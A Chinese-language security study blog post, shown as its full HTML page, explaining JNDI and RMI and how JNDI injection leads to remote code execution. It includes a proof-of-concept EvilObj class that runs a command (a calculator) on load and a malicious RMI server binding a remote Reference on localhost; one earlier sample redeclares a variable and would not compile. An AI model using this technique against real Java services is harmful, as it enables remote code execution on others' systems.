<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>zq1ang&#39;s blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="java安全学习-RMI安全之JNDI注入java命名和目录接口(Java Naming and Directory),也就是JDNI，是一种标准的Java命名系统接口，提供统一的客户端API，通过不同的服务供应接口，由管理者将API映射为特定的命名服务和目录系统，这样，Java就可以和这些命名&#x2F;目录服务之间进行交互。 命名服务与目录服务 命名服务是一种简单的键值对绑定，可以通过键名检索值，RM">
<meta property="og:type" content="article">
<meta property="og:title" content="zq1ang&#39;s blog">
<meta property="og:url" content="http://example.com/2021/11/25/RMI-security/index.html">
<meta property="og:site_name" content="zq1ang&#39;s blog">
<meta property="og:description" content="java安全学习-RMI安全之JNDI注入java命名和目录接口(Java Naming and Directory),也就是JDNI，是一种标准的Java命名系统接口，提供统一的客户端API，通过不同的服务供应接口，由管理者将API映射为特定的命名服务和目录系统，这样，Java就可以和这些命名&#x2F;目录服务之间进行交互。 命名服务与目录服务 命名服务是一种简单的键值对绑定，可以通过键名检索值，RM">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://zq1ang.github.io/img/jndi.png">
<meta property="article:published_time" content="2021-11-25T07:37:55.412Z">
<meta property="article:modified_time" content="2021-11-25T10:10:46.038Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://zq1ang.github.io/img/jndi.png">
  
    <link rel="alternate" href="/atom.xml" title="zq1ang's blog" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 5.4.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">zq1ang&#39;s blog</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-RMI-security" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2021/11/25/RMI-security/" class="article-date">
  <time class="dt-published" datetime="2021-11-25T07:37:55.412Z" itemprop="datePublished">2021-11-25</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <hr>
<h2 id="java安全学习-RMI安全之JNDI注入"><a href="#java安全学习-RMI安全之JNDI注入" class="headerlink" title="java安全学习-RMI安全之JNDI注入"></a>java安全学习-RMI安全之JNDI注入</h2><p>java命名和目录接口(Java Naming and Directory),也就是JDNI，是一种标准的Java命名系统接口，提供统一的客户端API，通过不同的服务供应接口，由管理者将API映射为特定的命名服务和目录系统，这样，Java就可以和这些命名/目录服务之间进行交互。</p>
<h2 id="命名服务与目录服务"><a href="#命名服务与目录服务" class="headerlink" title="命名服务与目录服务"></a>命名服务与目录服务</h2><p><img src="https://zq1ang.github.io/img/jndi.png" alt="jndi"></p>
<p>命名服务是一种简单的键值对绑定，可以通过键名检索值，RMI就是典型的命名服务，而目录服务是命名服务的拓展。它与命名服务的区别在于它可以通过对象属性来检索对象，LDAP是典型的目录服务，命名服务与目录服务的本质是一样的，都是通过键来查找对象。</p>
<p>jndi是对各种访问目录服务的逻辑进行了再封装,我们可以用jndi的方式来轻松访问rmi或者ldap服务，这样访问不同的服务的代码实现基本是一样的。</p>
<h2 id="JNDI实现"><a href="#JNDI实现" class="headerlink" title="JNDI实现"></a>JNDI实现</h2><p>在JNDI中提供了绑定和查找的方法：<br>bind：将名称绑定到对象中</p>
<p>lookup：通过名字检索执行的对象</p>
<p>接下来，我们编写代码使用jndi访问rmi服务</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">import java.rmi.Remote;</span><br><span class="line">import java.rmi.RemoteException;</span><br><span class="line"></span><br><span class="line">public interface IHello extends Remote &#123;</span><br><span class="line">    public String sayHello(String name) throws RemoteException;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>实现接口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">import java.rmi.RemoteException;</span><br><span class="line">import java.rmi.server.UnicastRemoteObject;</span><br><span class="line"></span><br><span class="line">public class IHelloImpl extends UnicastRemoteObject implements IHello &#123;</span><br><span class="line">    protected IHelloImpl() throws RemoteException &#123;</span><br><span class="line">        super();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    @Override</span><br><span class="line">    public String sayHello(String name) throws RemoteException &#123;</span><br><span class="line">        return &quot;Hello &quot; + name;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>创建一个类实现对象的绑定及远程对象的调用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">import javax.naming.Context;</span><br><span class="line">import javax.naming.InitialContext;</span><br><span class="line">import java.rmi.registry.LocateRegistry;</span><br><span class="line">import java.rmi.registry.Registry;</span><br><span class="line">import java.util.Properties;</span><br><span class="line"></span><br><span class="line">public class CallService &#123;</span><br><span class="line">    public static void main(String[] args) throws Exception&#123;</span><br><span class="line">        Properties env = new Properties();</span><br><span class="line">        env.put(Context.INITIAL_CONTEXT_FACTORY, &quot;com.sun.jndi.rmi.registry.RegistryContextFactory&quot;);</span><br><span class="line">        env.put(Context.PROVIDER_URL, &quot;rmi://localhost:1099&quot;);</span><br><span class="line">        Context ctx = new InitialContext(env);</span><br><span class="line">        Registry registry = LocateRegistry.createRegistry(1099);</span><br><span class="line">        IHello rhello = new IHelloImpl();</span><br><span class="line">        registry.bind(&quot;rhello&quot;, rhello);</span><br><span class="line">        IHello rhello = (IHello) ctx.lookup(&quot;rmi://localhost:1099/rhello&quot;);</span><br><span class="line">        System.out.println(rhello.sayHello(&quot;TEST&quot;));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>##jndi注入原理</p>
<p>就是将恶意的Reference类绑定在RMI注册表中，其中恶意引用指向远程恶意的class文件，当用户在JNDI客户端的lookup()函数参数外部可控或Reference类构造方法的classFactoryLocation参数外部可控时，会使用户的JNDI客户端访问RMI注册表中绑定的恶意Reference类，从而加载远程服务器上的恶意class文件在客户端本地执行，最终实现JNDI注入攻击导致远程代码执行</p>
<p>###jndi注入的利用条件</p>
<p>客户端的lookup()方法的参数可控<br>服务端在使用Reference时，classFactoryLocation参数可控</p>
<p>###利用代码</p>
<p>弹出计算器的恶意对象</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">import javax.lang.model.element.Name;</span><br><span class="line">import javax.naming.Context;</span><br><span class="line">import java.io.BufferedInputStream;</span><br><span class="line">import java.io.BufferedReader;</span><br><span class="line">import java.io.IOException;</span><br><span class="line">import java.io.InputStreamReader;</span><br><span class="line">import java.util.HashMap;</span><br><span class="line"></span><br><span class="line">public class EvilObj &#123;</span><br><span class="line">    public static void exec(String cmd) throws IOException &#123;</span><br><span class="line">        String sb = &quot;&quot;;</span><br><span class="line">        BufferedInputStream bufferedInputStream = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());</span><br><span class="line">        BufferedReader inBr = new BufferedReader(new InputStreamReader(bufferedInputStream));</span><br><span class="line">        String lineStr;</span><br><span class="line">        while((lineStr = inBr.readLine()) != null)&#123;</span><br><span class="line">            sb += lineStr+&quot;\n&quot;;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line">        inBr.close();</span><br><span class="line">        inBr.close();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public Object getObjectInstance(Object obj, Name name, Context context, HashMap&lt;?, ?&gt; environment) throws Exception&#123;</span><br><span class="line">        return null;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    static &#123;</span><br><span class="line">        try&#123;</span><br><span class="line">            exec(&quot;gnome-calculator&quot;);</span><br><span class="line">        &#125;catch (Exception e)&#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>恶意RMI服务器</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">import com.sun.jndi.rmi.registry.ReferenceWrapper;</span><br><span class="line"></span><br><span class="line">import javax.naming.NamingException;</span><br><span class="line">import javax.naming.Reference;</span><br><span class="line">import java.rmi.AlreadyBoundException;</span><br><span class="line">import java.rmi.RemoteException;</span><br><span class="line">import java.rmi.registry.LocateRegistry;</span><br><span class="line">import java.rmi.registry.Registry;</span><br><span class="line"></span><br><span class="line">public class Server &#123;</span><br><span class="line">    public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException &#123;</span><br><span class="line">        Registry registry = LocateRegistry.createRegistry(1099);</span><br><span class="line">        String url = &quot;http://127.0.0.1:6666/&quot;;</span><br><span class="line">        System.out.println(&quot;Create RMI registry on port 1099&quot;);</span><br><span class="line">        Reference reference = new Reference(&quot;EvilObj&quot;, &quot;EvilObj&quot;, url);</span><br><span class="line">        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);</span><br><span class="line">        registry.bind(&quot;evil&quot;, referenceWrapper);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2021/11/25/RMI-security/" data-id="ckwenivnx0000ag14gs5xcuty" data-title="" class="article-share-link">Share</a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2021/11/16/java%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0-%E5%8F%8D%E5%B0%84%E6%9C%BA%E5%88%B6/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title"></div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/11/">November 2021</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2021/11/25/RMI-security/">(no title)</a>
          </li>
        
          <li>
            <a href="/2021/11/16/java%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0-%E5%8F%8D%E5%B0%84%E6%9C%BA%E5%88%B6/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2021 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>